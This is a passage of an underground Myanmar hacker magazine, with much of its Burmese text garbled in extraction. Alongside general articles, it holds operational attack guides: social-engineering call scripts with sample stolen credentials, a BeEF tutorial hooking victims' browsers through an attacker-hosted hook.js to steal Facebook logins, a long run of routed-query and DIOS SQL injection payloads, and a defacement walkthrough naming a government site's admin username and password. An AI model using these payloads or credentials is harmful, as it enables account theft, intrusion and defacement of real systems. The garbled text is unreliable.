100 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Attacker: ။ ။႔ ( ႔ ၊) ႔႔ ႔ ။ ႔။ ၂၁။ Attacker ႔ ၊ ၐ ၍ ၍O ဏ ႔ ႔ ၊႔ Att ။ ။ဏ ႔ B St Attacker Attacker Account ဏ ၊ ၍ ႔ ။ ၍ ။ ။ ႔ ၏ Personal ID ။ ၎ Diversion Theft ။၎ - Reciver: ။ Attacker: MD ။ ႔ ႔။ ။ Reciver: ။႔ ႔ ။ ၂၂။ Attacker ၎၏ ၏ ၍ ။ ႔ Attacker ၊ ႔ ၊႔ ။ ၍႔ ၍။ Attacker: ႔႔ ။ ။ Reciver: Mail [email protected] ႔ ။၅ ႔ ႔ ႔ ။ ။ ။ ၂၃။ Attacker ၊႔ ၏ Attacker ၏ Mail ႔ ။႔ Power By Union Of Underground Myanmar Hackers
101 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ၏႔ ။ Diversion Theft Social ၍။ Engineering ႔၍ ႔႔ Diversion Theft ။ ႔ ဏ၊ ။ ၍ ၎႔ Diversion Theft ။႔ ၍ ႔ ႔ Network ၊ ၊ဏ ၍ ၊ Diversion Theft ။ Phishing ၂၄။ Phishing Fishing ၍ ၐ Email Social Engineering ။Phishing ၊ ႔ ။၎ Email ၏ ၏ Personal Mail Address ၏ P ၊ Online Bank Account ႔ ။႔ Web page ႔ ။ Email ၏ Email Password Link Click ၍ ၏ ။ ၎ Link Web Page ႔ Web Page ။ ၎ Web Page ၏ Personal ၊ Password ၊ Bank Account ႔ ႔ ။ Attacker P Web Page ၍။ ၏ Bank Account S tU t Bank Account ႔ဏ ။ ၍ Update Account ။၎U t Link http:\\\\Security.company.com\\update\\ update.html ႔ ၊ Login.html Att Phishing Web page Link ၍ Mail ႔ P Att ။၎ Phishing Attack Domain Name ၍ Login Page Power By Union Of Underground Myanmar Hackers
102 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Web page ႔ ၍ P႔ ။ ၂၅။ ႔ ၎ ႔၏ ၊ ၎ Phishing Mail Mail / Phishing Attacking ။ ၊ Phisher ၍ ၎၏ Data ။႔ ၊ ႔ ၏ Bank Account ႔ Bank ။႔ Link၊ Domain Name ။ ဏ Website security.company Web page link ။၎ Phishing Domain Phishing ႔။ http:// t P ႔ ။႔ http://www.mircor-soft.com ၊ http://www.micorsoft.com ။Phishing - Phis M ( )Phishing Email Grammer ၊ Spelling ၊ ( )Bank ဏ Personal M Email ၍။ ( )Bank ဏ Personal M ၍ Account ၍ ႔ ။ ၂၆။ Phishing E Website ၍႔ ။ Internet User Website ၊ UserName Account P Website ႔၎ Cookies Computer ။၎ Cookies Internet ။ ၍ Cookies User User Name Password ၊ URt User Register ႔ Power By Union Of Underground Myanmar Hackers
103 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH User ႔ ႔ ။႔ Phisher Link ႔ Website Phisher ၍ ႔ Personal Website C Phishing OR ။ Link C Cookies Phisher ။႔ User Name Password ၊၏ ႔ ။ ႔P L Vulneravilities W ၊PDF ႔ ၍D ႔ ၊ P ။ ၍ ၎D File Trojan Phisher ႔႔ ။O R File Data Phisher ႔႔ ။႔ ႔ Website ၊ Internet Security System OR ႔။ Email Login Page Email Link / File Storage Size ၍ Email Link ၍ P ။႔ Email Page Website ၊ Security ၍ ၍ ၊ Website Email ႔ Webpage ။ Phisher Phishing Webpage ။ Phishing Email F Mail ၊ Mail ႔။ IVR ၐ Phone Phishing ၂၇။ Phone Phishing Email Phishing ။Phishing Email ႔၍ Phisher ၏ ၍ PP ။ ၍P ။ Phone Phishing Vishing ၐ ။၎ ၏႔ ၍ ႔။ ၍ mail4u.com.mm Mail Service - Attacker: ၁- ၉၂၉ ။ Receiver: Attacker: ၉၂၉ ။ ။ mail4u Service Network Admin ။ Power By Union Of Underground Myanmar Hackers
104 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Receiver: ။mail4u ။ Attacker: ။ Receive: Attacker: ႔ mail4u Service Server Hard Disk System Receiver: Attacker: Error Dt Receiver: ႔ ၂၈။ Username M။ Attacker: M ။M Receiver: Attacker: ႔ User Name Password ႔ ။ Receiver: Attacker: ႔ Company ႔။ Receiver: ၊ Customer ႔P Attacker: ။၍ User P ၏M ။ ၊ ။ Username achitkoko Password ၂၉၁၈၂၇၃ ။ M ႔။ ၄ Company ၍ Password ။ Attacker ၍၍ ။ ၁- ၉၂၉ ။ ၉၂၉ ။ ။ mail4u Service Network Admin ။ ။ ။ mail4u ။၍ ။ ႔ Mail Account M ။ ၍ ႔႔ ႔ ၏ Mail Account ။ ။ Mail ၊ ႔ Report ။ Username Password ။႔ Account ႔႔ ။ ႔ ႔႔ Username Password Power By Union Of Underground Myanmar Hackers
105 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔႔ ။၍ ၵ Account ။ Receiver: ၊ Account ။ ၂၉။ Account ။ Username Moethout Account ၏ Password ၂၆၃၇၄၈၃၇ ။ Phone Phishing ၊ ၍ ။O B St ဏ ၍ ၏႔ ဏ Account ၏ Username ၊ Password Phone Phishint ၍ ။႔ Phone Phishing Company ၏ Network System Company Company ။ Attacker: Boss Company ။ Receiver: Attacker: ၊။ Receiver: Network Admin ။ Duty Attacker: Receiver: ။ Attacker: Receiver: ။ Duty ။ Attacker: ။ Receiver: Attacker: ။။ Receiver: Network ။ Attacker: ။၊ ။ ႔ ႔ Monitor Report System ႔ Using Status Status Network Alert ႔ ။ ႔ User ။ Alert Network Security Attack ။႔ ႔ ႔။ ။ Account Sign out ။ ။။ ။ ၊ Username Account ၐ ႔ ႔U ?P Duty Network Attack ။ ။။ ။ Status ။ ၊။ Power By Union Of Underground Myanmar Hackers
106 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Receiver: Username Password ။႔ Attacker: ။ Username moetain Password chitpankhat ။ ၊ ။ ၊ ၃။ ၍ Social Engineering ၊ ၍ ။ ႔ ႔ ။ ၊ ။ ၍ Account ၐ ႔ Phone Phishing ၊ ။႔ ၄ ၐ၍ ၄ ။ P၏ ႔ ၍ Phone Phishing ၏ Baiting ၃၁။ Baiting Phishing ၍ၐ Software ။ Phishing Email ၍ ႔ ။ Baiting Hardware ၏ Malware ၊ ။ Trojan Program ႔ ။႔ Floppy Disk ၊ CD USB Flash Drive ၊ ၊ ၐ၊ ။၏ ႔၊ ၍႔ Computer ။႔ ၄ Hardware Password Trojan Data Username ႔ ႔၊ BackDoor ၄ ။ ၏ Username၊ P ၊ ၐ။ ၃၂။ Social Engineering Baiting Hardware Power By Union Of Underground Myanmar Hackers
107 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔၊ Company Pt ၊ Antivirus Company Software ၊ Hardware ၍ ႔ ၊ ။ Baiting Social Engineering Computer ႔ Computer Company ႔ ၏ Computer ။ Bt ။ Quit Pro Quo ၃၃။ Quit Pro Quo ။Social Engineering Attack ၄ ၍ ။ Phone Number ႔၊ ၐ ၍ Company ၐၐ ။၍ ၐ ၄ၐ၏ ၐ ၏ Computer ။႔ ၏ Trojan Website Link ၊ ႔ Command ႔ ။ ၂၃ ၐ Company ၉ ၄ ၏ Username ၊ Password ၊ ၍။ ၃၄။ Blogging Internet ၍ Social Engineering Website ၍ ၏႔ ၏ Computer ။ Social Engineering Attack ၐ ၍ ။ ၃၅။ Social Engineering ၊ Email ၊ ။ Power By Union Of Underground Myanmar Hackers
108 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Chatting ။ Instant Messaging System C tt Social Engineering ၍ ။C tt ၏၊ ။ ၍ C tt ။၍ ၏။ ၊ ၍၊ ၍ ႔။ ႔၏ ႔ ၐ ။၍ ဏ ။ C tt Social Engineering ၏ ႔၏ ။ ၊ ၊E ၍ ၍၊ ႔ ။ Mail4u Service Mail Address Social Engineering ၍ Mail Password ။Mail4u Company ။ ၏ ၍ Mail Service Company P Password ၍ ။Mail Service Company ၄႔ ၍ ။႔ Company ႔ ၊ ။႔ Company Mail Password ၏ ၏ ႔ ။ ၃၆။ Social Engineering Network ၊ ။ Network Administrator ၏ ၏ Social Engineering ၏ Power By Union Of Underground Myanmar Hackers
109 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ။ၐ ၐ ႔ ။ ။ ႔၏ ၊ ႔ ။ Social Engineering ၍ ။ ႔ ။ ၍ ၊ S Spam ၏ ၍ Mail ၊ Password ႔ Phisher ၏႔ ၍ ။႔ ၏႔ Mail 24 Hours ။ Mail ႔ ၍ ။ ႔၏ ။ ၍ Mail Account ။ Account S ၍ ။ Network Administrator ႔ ႔ ၍ ၏ Network ၊ ၄ ၏ Network ႔ ၍ ၊E ။ ၓ၏ ၓ၍ ႔ ။ ။ Social Engineering ။ ၍၄ Social E ၏ ၄ၐ ။ ႔ Social Engineering ။ g4 MHU Power By Union Of Underground Myanmar Hackers
110 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH BITCOIN ( BTC ) H1N1 And Naing Lin Oo Bitcoin Nt ၊၂ ၈ ႔ St ။ Bitcoin ၊ ႔႔ ၂၉ 1 BTC USD 4 D ၊ ၐ 1 BTC USD 16860 Dollar ၊ Bt ၊ Bitcoin ၂ ၁၇ ႔ ဏ ၊ Bitcoin ၂ ၁၆ USD ၂ ၁၇ USD ၐ ၂ ၁၇ Ransomware Wanna Cry ၊ Exchange ၁၅ USD ၊ Wanna Cry Ransomware ႔ Microsoft Windows Operation System ၊ Bitcoin ၐ Encrypt ႔ ႔ ၊ BTC Bitcoin ႔ ။B t ႔ BTC ႔ ႔။ 2018 $64 Million ။ ၊ BTC ႔ Power By Union Of Underground Myanmar Hackers
111 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH DOCKER (၁) ႔ ( IT ) Docker ၊ ။ Docker Docker open-source ။t Linux Container( LXC) Deploy ။ Containerization ႔ ။ L OS ၐ ႔ operating system level virtualized ။ virtualized t VMware, Virtual Box ႔ Hypervisor Virtualization Containerization ။ Virtualization Containerization ။ Image Source: https://jaxenter.com/ ။ virtualization Host OS hypervisor guest OS ။ Guest OS Kernel၊ L Containerization Host OS K , L ။ virtualization P Host OS ( server) ။ Performance ၊ ။ RAM 8 GB Host OS virtualization Host 2GB 2GB guest OS ႔ ။ 8GB ။ Ct ႔ Ht ၐ Power By Union Of Underground Myanmar Hackers
112 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Performance ။ Containerization ႔ ။ Virtualization ။ Docker Installation Docker Linux Container ( LXC ) Microsoft Window ႔ t ၊Window 10 ႔ Window Server 2016 ။ Linux ။ Docker Community Edition ( CE ) ႔ Enterprise Edition ( EE ) ။ Docker CE ။D EE ။ https://www.docker.com/pricing Docker Install ႔ C ။ #zypper in docker ( openSuSE based ) #apt-get install docker-ce ( Ubuntu based) #dnf install docker-ce ( Fedora based) openSuSE ႔ ။ #zypper in docker Power By Union Of Underground Myanmar Hackers
113 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Dt tt ။ #systemctl start docker.service T tI H run ။ #docker run hello-world H dock ။ Docker Developement Build -> Ship -> Run ႔ ႔ ။ Build ႔။ ႔ run ႔ Power By Union Of Underground Myanmar Hackers
114 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH I ႔ ။Docker O ၊D DI ။ ။ https://hub.docker.com/explore/ Development Environmet ။။ ။ DC C tS t ။ PDF link: https://www.docker.com/sites/default/files/Docker_CheatSheet_08.09.2016_0.pdf Docker ႔ ႔ ။ Konova ( openSuSE Myanmar Team) Power By Union Of Underground Myanmar Hackers
115 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Developer vs Pentester In Myanmar Develpoer ႔ ႔D ႔႔ ။ Mobile Phone operating system (IOS,Android,java and etc ) application D ။႔ Website Developer ၊software developer ၊game developer ၊ application developer ၊ iOS developer ၊ android developer ႔D ။႔ ႔ ၊႔ ။ ႔ programming ဏ ။႔ ႔ Security ။ Developer ။ Pentester Pentester Programming ။ ႔႔ zero day exploit programming ႔ ၊ Pentest Website, software, game , application,operating system D ။ ႔ Pen- Bug ႔ ၐ developer ၊ ။ ။႔ ႔ ။ Developer Developer ႔ company ႔ Developer ႔ company ႔ tester ႔ ။ website t ။ Website ၊႔ ၏ ၐ။ ။ website Facebook ႔ Website Facebook White Hat list ဏ Facebook White hack list ဏ ။ Ebay ဏ ။ Ebay ၏ White Hack List ။ pentester ။ Power By Union Of Underground Myanmar Hackers
116 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH P tt ။ Google search engine website t ။H ၊ ။ ၍ Developer ၊ ၊ ႔ ၊ ။ tt ႔ ။ ။ tt t ။ Myanmar Hacker t pentest ။ website ႔ online banking ။ ၂၄ shutdown ႔ ႔ Developer ။ UGMH ႔cyber war online bank ။screenshoot ၎ ႔ UGMH Page ။ website cyber war t ။ ဏ website ။ website ။ Developer pentester ႔ ။ t bug report ႔ pentester ႔ ။ bug report ႔ Power By Union Of Underground Myanmar Hackers
117 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH website ၊ ၊ ၐ website ။ H ။ Error \" ။ website ၍\" ၐ server ။႔ ။ website ၏ ၐ။ ႔ app website tt ။႔ t ။ pentester website ႔ tt ၍ ႔။ Developer pentester ၊ cyber space …။ Mr.Ph03nix (Black Hat Area) Power By Union Of Underground Myanmar Hackers
119 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Cyber Warfare Mg Alarm @ Myanmar Security Forum [x] What is Cyber War -> - ၂၁ ႔႔ War ။ ႔ Media Media War ။ ႔ Commercial War ။ ႔ ႔ Online Hack Cyber War ။ ႔ ၊ ၊၊ ၊ ႔ ႔႔ ႔ Cyber War ႔ ၊Cyber War ၊ Cyber War ႔ ႔႔ E-Govermence / E-Commerce / Communication System O ၐ ။ -Cyber War Government / Military ႔ ။ ၊ ၊ ႔ ၊ Political Reason ႔ Hacktivists ။ ။ Cyber War ။ ။ Cyber War ၐ - Cyber Warfare Nt Wt G tP t Down ၊ Wt D t /M t ႔C ႔S ။ Website Database ၊ ... D t /P Dt ႔႔ ။ [x] Examples of CyberWarfare -> ႔႔ - ၁၉၉၈ ႔ Air Traffic Control ႔ Air Defense System ႔ Tt ႔။ -၂ ၇ Estonia ႔ website / website / t ႔ botnet ႔ Ddos ႔O ႔ ။ Power By Union Of Underground Myanmar Hackers
120 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Estonia ႔ ၂ ႔ ႔႔ ႔႔ ။ -၂ ၇ C ႔ Mt A Download 1T H t / G 1000 I t ႔။ -၂ ၉ ၁ Government ႔ P t Ot t GhostNet ႔ ၐ ႔ Cyber Spy Network ႔။ GhostNet ႔ Original China ႔ ႔႔ ႔ ႔ Responsibility ႔။ ႔ -၂ ၈ ႔ ႔။ ၃ t tG tW t C Deface ။DDoS ။ Wt M ႔ ႔႔ ။R t ႔ ႔ ႔။ [x] What Do We Know -> ႔ ႔ .. - Cyber War ႔။ ႔။ - Cyber Attack ႔ C D ႔ ။ - Att HP St HV T t ။ - H V St Wt ႔ ႔ ႔ Government Website ၊ C ၊M W t ။ - Political Reason ႔ ႔ ႔ Cyber War ။C I t ႔ ။P t Dt ။ ။ ၊ ၊M t D t ။C D t Power By Union Of Underground Myanmar Hackers
121 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH [x] GhostNet -> Cyber War ႔ ။ၐ ႔ ႔ Cyber Espionage Network : GhostNet ... Remote Administration Tool (RAT) BotNet ...Canadian Report GhostNet Web Cam / Microphone ႔ Network Infected Computer ႔ device Operate ။ Download ။Computer Full Access ႔ ။၂ ၉ March ႔။ ႔ ႔ ႔ Email ၐ။ meeting ႔ GhostNet ။ ။ ႔ meeting ႔ Warning ၁ Military / Government R Dt Ct ၁၃ / Commercial ႔။ ၁၃ ၁၃ ႔။ ။C GhostNet ႔ ႔ New York Time ႔ ။ Ghost Net ႔I t Ct ၃ ႔ ။ Bangladesh, Latvia, Indonesia, Philippines, Brunei, Barbados, and Bhutan, embassies of India, South Korea, Romania, Cyprus, Malta, Thailand, Taiwan, Portugal, Germany, and Pakistan ႔ ႔ ၊ ဏ Asia Development Bank ၊ ၊ ႔ GhostNet ႔ North Atalantic Treaty Organization NATO ႔႔ ။ …… Att Access ။ Cambridge Report ႔ Attacker Attachment Download U Spam Mail ႔ ႔ Netwok ႔။ [x] Unit 121 -> ႔C ႔႔ ႔ Bureau 121 ၊ Unit 121 ႔ ႔ North Korea Cyber Warfare Agency ၁၉၉၈ ႔႔ ။၂ ၁၁ ႔ ဏS C Power By Union Of Underground Myanmar Hackers
122 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔ ႔။ ႔။ ႔ ႔ ႔ ႔႔ ႔ ႔႔ ႔ ။ ႔ Computer Science Professor ႔႔ Cyber Warfare ႔။ Ut L ။ ႔/ Computer Science ႔ ႔ ။ Wiki Specialist ၊ ႔H ႔။ 1800 ။ Cyber Spying ႔ ႔႔ ႔၈ ႔ ။၂ ၁၄ ၁၁ ႔ ႔ The Interview ႔ Sony Film ႔ Internal Network hack ႔ ။ ႔ Computer Screen Red Skeleton ၊ ႔ Message ႔ ႔ ။ H ႔ (GOP )Gurdian of Peace ႔ ။ H Sony It Dt ႔ Sony P Terabyte ႔ ႔ ႔။ ႔ O Sony It P E Sony ႔ ႔။ F H t St Leaked ႔ ။R ။ ႔ t record / proof ႔ zone-h ၂၁ ႔ submit ႔ D t ၁၄ ႔ ။႔ ။ zataz.com ႔ ႔ hacker ႔ ႔ whitehous- e.gov deface ႔ ႔ ... ႔ t ႔ ႔ Defacement ။ [x] Cyber Warfare ? Why They Choose ? ။ ၂၁ C W CC ႔။ ၂ ၇၂ ၉ ႔ Joint Strike Fighter F35 Lightning 2 ႔ ႔ ႔ file / data / Air Force's air traffic control ႔။ ၇ ႔H systems ၐ ႔ ႔ ႔ ႔ ႔ Military ႔ Company ။ ၃ ႔ USCyberCom ႔။ ႔ ႔႔ ။ ႔ Power By Union Of Underground Myanmar Hackers
123 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH T ႔ Attack ႔႔ ။ ႔ Washington CNN ႔ ႔ ႔။ ၂၁ ႔ ႔ Computer ႔ Network ၐ။ ႔ Nt It t O Real Life ၊ ။ ႔။ ႔ ။ ။Laptop Cyber War | Warfare in the Cyber Space ႔ Cyber ႔ ႔႔ ႔႔ ႔ Laptop ႔ C ႔ ။Cyber Field ။ ႔႔ A။ A႔ Oၐ I tW PW ႔။ [x] Conclusions -> ႔ CW ႔ Cyber Terrorism ၊ Cyber Espionage ႔ ။ ။ၐ ႔႔ CW ။ Cyber ႔ ။ C Att ႔ ႔ Cyber Defence ။ ႔ Cyber War ၊ Cyber War ႔ ႔႔ ။။ Mg Alarm @ Myanmar Security Forum Power By Union Of Underground Myanmar Hackers
124 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH facebook account TaikKyi Thar Facebook Hacking ။႔ ။ Facebook Social Network Internet ။ facebook hacking ။ Facebook socail network personal ႔။ ။ skill ႔ Social Engineering ႔ ႔။ ။ Kali Linux,Networking knowledge, linux knowl ႔ ။Kali Linux install ႔ ။ ။႔ Tool Browser Exploitation Framework (BeEF) ‘ BeEF victim's browser hack ။V t Browser ႔။ ႔ Browser Facebook Account ။ 1. Open BeEF Kali Linux terminal beef-xss ။ beef panel Browser ႔။ http://127.0.0.1:300/ui/panel Panel ႔ Username ,password ။ Power By Union Of Underground Myanmar Hackers
125 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH 2. Hook the victim's browser t ‗H ‘ User Browser ႔ ။ ႔ javascript code link user click Browser ။local network Man In The Middle Attack VPS ၐ BeEF install hack ႔ t ႔။ ႔ skill ။ ႔ ။Kali Linux ႔ ။ Kali linux local ip ႔ ifconfig ႔ ။B ―G tt ‖ ။ Power By Union Of Underground Myanmar Hackers
126 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Local IP ႔ Javascript code IP ႔။ <script src= \"http://192.168.1.101:3000/hook.js” ; type= \"text/javascript\" ></script> IP 192.168.1.101 ။ ip ။ ႔ javascript code webpage t ႔။ ႔ Kali Linux ။ js code apach webpage ။ save terminal service apache2 start R ။ Power By Union Of Underground Myanmar Hackers
127 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH attack User Browser ႔႔ ။ local ip address http://192.168.1.101 ႔ SE victim ။ SE ။ ႔႔ link victim ႔ panel online browser Ip ႔ ၐ BeEF ။႔ command search Pretty theft facebook ။ Power By Union Of Underground Myanmar Hackers
128 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Execute ။ victim Browser ။ t tt email,password ႔ BeEF panel ။ Power By Union Of Underground Myanmar Hackers
129 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH facebook ? ။ ႔ ။ password Facebook Security and Loign 1. Get alerts about unrecognized on ။ 2. Use tow-factor authentication on ။ 3. Trusted Contacts on ။ ႔ ႔ ။F remove t ။ TaikKyi Thar Power By Union Of Underground Myanmar Hackers
130 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Sqli Injection [ routed query] Sql injection ႔ ။႔ tt ။ ႔။ sql injection ။ Sql Injection ။႔ ။ Sql Injection ။ ။ Injection point: http://site.com/urunler.php?id=83 Err / 83 (‘) ။ http://site.com/urunler.php?id=83‘ HATA : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\'' at line 1 E ။Error ။ http://site.com/urunler.php?id=83 order by 1 [No Err] http:// site.com/urunler.php?id=83 order by 2 [No Err] http:// site.com/urunler.php?id=83 order by 9 [No Err] http:// site.com/urunler.php?id=83 order by 10 [No Err] http:// site.com/urunler.php?id=83 order by 11 [Err] Power By Union Of Underground Myanmar Hackers
131 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Unknow column 11 column 10 ။ ။ :P http://site.com/urunler.php?id=-83 Union Select 1,2,3,4,5,6,7,8,9,10 http://site.com/urunler.php?id=-83 Union Select 1,2,3,4,5,6,7,8,9,10-- - http:// site.com /urunler.php?id=-83 div 0 Union Select 1111111,2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,101 01010 Vul column ။ Source ။။ Power By Union Of Underground Myanmar Hackers
132 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Routed Quey http://site.com/urunler.php ?id=-83 div 0 Union Select 1',2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010 C1 ' H 1‘=0 3127 http://site.com/urunler.php ?id=-83 div 0 Union Select 0x3127,2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101 010 Power By Union Of Underground Myanmar Hackers
133 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Err :P column http://site.com/urunler.php ?id=-83 div 0 Union Select 1 order by 1,2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010 1 order by 1=0x31206f726465722062792031 http://site.com/urunler.php ?id=-83 div 0 Union Select 0x31206f726465722062792031,2222222,3333333,4444444,55555555,66666666,77777777,888 88888,99999999,10101010 Err ၂ ။ Order by 10 ။ http://site.com/urunler.php ?id=-83 div 0 Union Select 0x31206f72646572206279203130,2222222,3333333,4444444,55555555,66666666,77777777,8 8888888,99999999,10101010 http://site.com/urunler.php Power By Union Of Underground Myanmar Hackers
134 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ?id=-83 div 0 Union Select 1 order by 11,2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010 http://site.com/urunler.php ?id=-83 div 0 Union Select 0x31206f72646572206279203131,2222222,3333333,4444444,55555555,66666666,77777777,8 8888888,99999999,10101010 U ‘11‘ ၁ http://site.com/urunler.php ?id=-83 div 0 Union Select 1 Union Select 1,2,3,4,5,6,7,8,9,10,2222222,3333333,4444444,55555555,66666666,77777777,88888888,999 99999,10101010 http://site.com/urunler.php ?id=-83 div 0 Union Select 0x3120556e696f6e2053656c65637420312c322c332c342c352c362c372c382c392c3130,2222222, 3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010 Power By Union Of Underground Myanmar Hackers
135 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH VC ။ title ။ http://site.com/urunler.php ?id=-83 div 0 Union Select 1 Union Select 1,concat(</title><br>,222222222),3,4,5,6,7,8,9,10,2222222,3333333,4444444,55555555,666 66666,77777777,88888888,99999999,10101010 http://site.com/urunler.php ?id=-83 div 0 Union Select 0x3120556e696f6e2053656c65637420312c636f6e636174283078336332663734363937343663 3635336533633632373233652c323232323232323232292c332c342c352c362c372c382c392c31 30,2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010 Version ။ http:// site.com/urunler.php Power By Union Of Underground Myanmar Hackers
136 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ?id=-83 div 0 Union Select 1 Union Select 1,concat(0x3c2f7469746c653e3c62723e,version()),3,4,5,6,7,8,9,10,2222222,3333333,4444444, 55555555,66666666,77777777,88888888,99999999,10101010 http:// site.com/urunler.php ?id=-83 div 0 Union Select 0x3120556e696f6e2053656c65637420312c636f6e6361742830783363326637343639373436633 635336533633632373233652c76657273696f6e2829292c332c342c352c362c372c382c392c3130, 2222222,3333333,4444444,55555555,66666666,77777777,88888888,99999999,10101010 DiOs http:// site.com/urunler.php ?id=-83 div 0 Union Select 1 Union Select 1,concat(0x3c2f7469746c653e3c62723e,(Select+export_set(5,@:=0,(select+count(*)from(infor mation_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),col umn_name,0xa3a,2)),@,2))),3,4,5,6,7,8,9,10,2222222,3333333,4444444,55555555,66666666, 77777777,88888888,99999999,10101010 http://site.com/urunler.php ?id=-83 div 0 Union Select 0x3120556e696f6e2053656c65637420312c636f6e6361742830783363326637343639373436633 635336533633632373233652c2853656c6563742b6578706f72745f73657428352c403a3d302c28 73656c6563742b636f756e74282a2966726f6d28696e666f726d6174696f6e5f736368656d612e63 6f6c756d6e73297768657265403a3d6578706f72745f73657428352c6578706f72745f7365742835 2c402c7461626c655f6e616d652c307833633663363933652c32292c636f6c756d6e5f6e616d652c 30786133612c3229292c402c322929292c332c342c352c362c372c382c392c3130,2222222,33333 33,4444444,55555555,66666666,77777777,88888888,99999999,10101010 Power By Union Of Underground Myanmar Hackers
137 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH IG t t…H I t …… ။။။ St ။ ။ Union Select Union Union Select ။S S t ။ Select ။ Union base ။Injection ႔ ။ ။ Sql God BMH Power By Union Of Underground Myanmar Hackers
138 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH CSRF(cross site request forgery) By webkitz (Myanmar Security Forum) What is CSRF? One Click Attack / Session Riding / Sea-Surf or C-Surf / XSRF ၐၐ Cross Site Request Forgery(CSRF) attack web application t tt (end user) ၄ t attacker(hacker) ။ attacker target(victim) ၄ malicious request Link / web page email / chat social engineering . ။ victim attacker ႔ malicious link ႔ link submit button click ၄ victim / attacker t victim ႔ execute ။ victim user attacker - victim transfer ၊ - change web application ၐ forged request ။ tt t ၍ victim web app attacker Power By Union Of Underground Myanmar Hackers
139 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH -administrative account ၊ -admin . /၊ - tt tt ၊ - tt /၊ -t request ႔ administrative level victim session riding entire web application ။ attacker administrative access ၐ t upload web server ၒ ။ CSRF attack t tt t ၊ attacker .၄ t႔ ။ CSRF Attack (Example) Bank website ( Eg. www.examplebank.com ) user website log ႔ၐ in t t t ႔ ။ web server ႔ user login ၄ user . browser session id ။ / user log out ။ ( ၍ user log out / )။ bank website user ႔ user account ႔ feature ။႔ (Eg. www.examplebank.com/transfer ) Power By Union Of Underground Myanmar Hackers
140 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH User . ၄ form HTTP request ။ . attacker t tt . user social engineering t . html web link . ။ Eg. www.attackerwebsite.com/winmoney.html user bank website t tt attacker trick ၄ ႔ submit button Power By Union Of Underground Myanmar Hackers
141 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH user attacker account ႔ 100 ။ user ႔ attacker ႔ malicious web link / malicious ။ / user bank website . request . attacker java script tt ႔ ။ attacker . victim submit button java script tt .။ Example malicious script CSRF attack ။ ႔ ႔ CSRF attack google ။ , ႔ Knowledge ႔ HTTP t ၊ tt . POST,GET R ။ CSRF attack 2001 OWASP . Top Ten vulnerabilities ။ world- ႔ CSRF preventing Power By Union Of Underground Myanmar Hackers
142 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH csrf tokens , same site cookie . Anti-csrf technique ၐ Youtube, ။ Is CSRF dead? . . t csrf attack ႔ ႔ Netflix, ING Direct, McAfee ၊ ၐ ႔။ anti-csrf token bypass 0႔ ။ Webkitz(msf) Power By Union Of Underground Myanmar Hackers
143 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH How to deface with JS or XSS defacement mr.Gh0st N@0b ( Myanmar Noob Hackers Team) ႔ Sql Injection Admin User ႔ Password Shell ။ Admin User ႔ Password Shell ။ JS or XSS defacement ။ Op_Turkish 2017 ႔ ႔ Sql Injection ႔ Admin, Password Shell ႔ UGMH Defacement ႔ ။ Java Script Defacement ။ Java script ႔ XSS ။ ။ Demo ႔ Gov.bd ။ http://www.sciti-sme.gov.bd/ User Name scitisme ၊ Password 2468@sciti123 ၊ SI t ။ http://www.sciti-sme.gov.bd/admin/ Admin Login ။ Login Admin Dashboard ။ ၁။ Defacement XSS Alert ႔ ။ Deface ႔ Tag XSS Alert ႔ ။ XSS Alert Defacement ႔။ Power By Union Of Underground Myanmar Hackers
